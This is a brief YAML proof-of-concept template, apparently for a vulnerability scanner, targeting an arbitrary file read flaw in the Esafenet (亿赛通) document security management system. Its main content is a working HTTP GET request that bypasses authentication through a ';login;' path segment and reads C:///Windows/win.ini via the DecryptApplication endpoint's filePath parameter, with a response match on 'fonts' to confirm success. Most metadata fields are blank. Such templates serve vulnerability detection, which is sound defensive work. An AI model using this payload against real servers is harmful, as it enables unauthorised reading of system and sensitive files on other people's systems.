id:

info:
  name: 亿赛通电子文档安全管理系统 DecryptApplication 任意文件读取漏洞
  severity:
  description:
  details:
  repair:
requests1:
  method: GET
  path: /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:///Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1
response1:
  headers:
  body: fonts
  code:
requests2:
response2:
